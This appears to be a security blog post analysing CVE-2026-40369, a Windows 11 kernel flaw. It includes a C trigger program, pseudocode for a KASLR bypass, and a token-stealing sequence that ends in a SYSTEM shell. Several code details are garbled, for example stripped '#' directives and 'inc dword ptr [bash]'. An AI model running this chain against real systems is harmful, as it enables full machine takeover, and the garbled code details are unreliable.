Listen to this Post
Introduction:
A newly disclosed Windows Kernel vulnerability, identified as CVE-2026-40369, has sent shockwaves through the cybersecurity community. Discovered by researcher Ori Nimron, this flaw allows an unprivileged attacker, even one confined within a modern browser sandbox like Chrome or Edge, to achieve full SYSTEM-level privileges on affected Windows 11 systems (versions 24H2 and 25H2). The vulnerability lies in a logic bypass within the heavily-audited `NtQuerySystemInformation` syscall, transforming a seemingly innocuous kernel function into a powerful, 100% deterministic local privilege escalation (LPE) primitive. This article dissects the technical root cause, provides step-by-step analysis, and outlines defensive measures for this critical threat.
Learning Objectives:
– Understand the root cause of CVE-2026-40369, specifically the logic flaw in `ExpGetProcessInformation` and the `ProbeForWrite` bypass.
– Learn how to trigger the vulnerability and analyze the resulting crash or controlled kernel memory write.
– Explore the exploitation chain used to escape a browser sandbox and escalate privileges to SYSTEM, including KASLR bypass techniques.
You Should Know:
1. Root Cause Analysis: The 12-byte Write Primitive
The vulnerability is triggered by a specific call to the `NtQuerySystemInformation` syscall. When called with information class `253` (`SystemProcessInformationExtension`) and a zero-length buffer, a critical validation step is skipped, allowing a user-supplied kernel pointer to be used directly without proper checks.
The Flawed Code Path: The `ProbeForWrite` function in the kernel is responsible for validating that a user-mode buffer is safe to write to. However, its body is bypassed entirely when the `Length` parameter is `0`. The syscall handler for class `253` then passes this unchecked pointer down to the `ExpGetProcessInformation` function.
The Unchecked Write: Inside `ExpGetProcessInformation`, for every running process on the system, the function attempts to increment three adjacent `DWORD` (4-byte) values at the user-supplied address. Since the address is never validated to be in user mode, an attacker can point it to any writable kernel memory address.
Step‑by‑step guide to triggering the vulnerability (Conceptual Code Snippet):
This code demonstrates how a low-privileged process can trigger the arbitrary kernel address increment. This example aims to cause a controlled crash by targeting a NULL pointer, illustrating the primitive’s power.
// WARNING: This is for educational purposes only. Running this on an unpatched system will cause a BSOD.
include <windows.h>
include <stdio.h>
// Define the system information class (253)
define SystemProcessInformationExtension 253
// Define function prototype for NtQuerySystemInformation
typedef NTSTATUS (NTAPI pNtQuerySystemInformation)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
int main() {
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation");
if (!NtQuerySystemInformation) {
printf("Failed to get NtQuerySystemInformation address.\n");
return 1;
}
// Target a kernel address. Using 0x1 (or any invalid address) will cause a crash.
// A real exploit would target a valid, writable kernel structure.
PVOID kernelAddress = (PVOID)0x1;
ULONG returnLength = 0;
printf("Triggering vulnerability with kernel address: %p\n", kernelAddress);
// Trigger the bug: Call with class 253, kernel address, and length 0.
NTSTATUS status = NtQuerySystemInformation(
SystemProcessInformationExtension,
kernelAddress,
0,
&returnLength
);
// The call will likely cause a PAGE_FAULT_IN_NONPAGED_AREA (0x50) BSOD before returning.
printf("Status: 0x%08X\n", status);
return 0;
}
Windows Analysis Commands (for debugging):
To analyze this crash or a memory dump, use WinDbg to inspect the faulting instruction and the kernel pointer being dereferenced.
After the system crashes, open the memory.dmp file in WinDbg. !analyze -v This will show the faulting instruction and the memory address (Arg1). Expected output for a NULL dereference: PAGE_FAULT_IN_NONPAGED_AREA (50) Arg1: 0000000000000001, memory referenced. You can then disassemble the code around the faulting instruction. u @rip-10 L10 This will reveal the inc dword ptr [bash] instruction that caused the fault.
2. From Crash to Kernel Read: Bypassing KASLR
A raw increment primitive is powerful but blind. To build a reliable exploit, an attacker first needs to defeat Kernel Address Space Layout Randomization (KASLR) to locate critical kernel structures (like the `EPROCESS` token). The CVE-2026-40369 exploit chains the write primitive with a separate information leak.
Leveraging the Write Primitive: The first step is to use the `NtQuerySystemInformation` bug to carefully modify a specific byte in a kernel feature state (`Feature_RestrictKernelAddressLeaks`). By changing this value, the attacker can re-enable deprecated, information-leaking system information classes.
Achieving Kernel Read: Once the leak is re-enabled, a separate call to `NtQuerySystemInformation` (e.g., with class `SystemModuleInformation`) will return sensitive kernel addresses, including the base address of `ntoskrnl.exe`. This completely defeats KASLR.
Step‑by‑step guide to the KASLR bypass concept:
This Python-like pseudocode outlines the logical steps an exploit would take to disable the kernel leak mitigation and obtain a kernel base address.
PSEUDO-CODE for KASLR Bypass using CVE-2026-40369
1. The target address of the feature byte (offset varies by build).
feature_byte_address = ntoskrnl_base_guess + offset_of_Feature_RestrictKernelAddressLeaks
2. Use the vulnerability to increment the target address.
Incrementing the value once will change its state.
For example, changing a value from 0x57 to 0x58 might disable the feature.
call_nt_query_system_information(class=253, buffer=feature_byte_address, length=0)
3. After the feature is disabled, call a leaking information class.
The kernel now no longer sanitizes the output for this class.
buffer = allocate_buffer(0x1000)
return_length = 0
call_nt_query_system_information(class=11, buffer=buffer, length=0x1000, return_length) Class 11 = SystemModuleInformation
4. Parse the returned buffer to extract the kernel base address.
kernel_base = parse_system_module_information(buffer)
print(f"[+] Kernel base address leaked: {hex(kernel_base)}")
3. Token Stealing: The Final Ascent to SYSTEM
With a kernel read/write primitive and a known kernel base address, the final step is classic token stealing. The attacker leverages the arbitrary increment to corrupt a system structure, granting their process the highest level of privilege.
Locating the Target: Using the leaked kernel base, the exploit locates the `PsInitialSystemProcess` symbol. This points to the `EPROCESS` structure of the SYSTEM process (PID 4). From there, it can locate the `EPROCESS` structure for the attacker’s own process.
The Token Swap: Inside the `EPROCESS` structure is a field pointing to the process’s security token (`Token`). The exploit uses its arbitrary kernel write primitive to overwrite its own process’s token pointer with the pointer to the SYSTEM process token. Once the token is swapped, the attacker’s process inherits the full privileges of SYSTEM.
Step‑by‑step guide to the privilege escalation chain (Command List):
This is a high-level sequence of commands and operations an exploit would perform to achieve SYSTEM.
[Attacker's Process, Low/Medium Integrity] 1. [Information Leak Phase] > Trigger CVE-2026-40369 to modify Feature_RestrictKernelAddressLeaks byte. > Call NtQuerySystemInformation with class 11. > Parse response to get ntoskrnl.exe base address (e.g., 0xfffff800`66200000). 2. [Structure Discovery Phase] > Calculate offset to PsInitialSystemProcess from leak (e.g., +0x1234567). > Read kernel memory at that address to get SYSTEM EPROCESS pointer. > Traverse EPROCESS linked list to find our own process's EPROCESS. 3. [Token Swapping Phase] > From SYSTEM's EPROCESS, read the Token pointer (at offset +0x4b8). > Calculate the address of the Token field in our own EPROCESS. > Use the write primitive to overwrite our token with the SYSTEM token. 4. [Verification Phase] > Call CreateProcess to spawn a new cmd.exe shell. > The new shell will run with NT AUTHORITY\SYSTEM privileges. > whoami > nt authority\system
What Undercode Say:
– The disclosure of CVE-2026-40369 shatters the illusion that heavily audited, legacy code paths are inherently secure, revealing a profound logic flaw that allowed a single syscall to bypass decades of kernel hardening. The exploit is not just a theoretical bypass but a “100% deterministic” tool, meaning it will work reliably every time it is run, a nightmare for defenders who rely on probabilistic exploit mitigation.
– The most alarming aspect is its reachability from a browser’s renderer sandbox, as the `NtQuerySystemInformation` syscall is intentionally left unblocked. This effectively collapses the security boundaries between the web and the operating system, turning a browser compromise into an immediate and trivial total system takeover.
Prediction:
– -1 The existence of a functional, deterministic exploit at the Pwn2Own level will accelerate Microsoft’s patch cycle. However, due to the complexity of the `ntoskrnl.exe` codebase, we can expect to see several incomplete or bypassed patches for this vulnerability class in the coming months.
– -1 The publication of the full exploit chain and the `prefetch-tool` on GitHub has dramatically lowered the barrier to entry for kernel exploitation. Script-kiddies and less sophisticated threat actors will quickly weaponize this into a reliable, plug-and-play tool, leading to a surge in LPE attacks in the short term.
▶️ Related Video (84% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
[Join Undercode Academy for Verified Certifications](https://undercode.co.uk/certifications/)
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[[email protected]](mailto:[email protected])
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: [Aleborges Vulnerability](https://www.linkedin.com/posts/aleborges_vulnerability-informationsecurity-exploitation-share-7465399045960773632-lkEQ/) – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
[💬 Whatsapp](https://undercode.help/whatsapp) | [💬 Telegram](https://t.me/UndercodeCommunity)
📢 Follow UndercodeTesting & Stay Tuned:
[𝕏 formerly Twitter 🐦](https://x.com/undercodeupdate) | [@ Threads](https://www.threads.net/@undercodetesting) | [🔗 Linkedin](https://www.linkedin.com/company/undercodetesting/) | [🦋BlueSky](https://bsky.app/profile/undercode.bsky.social)
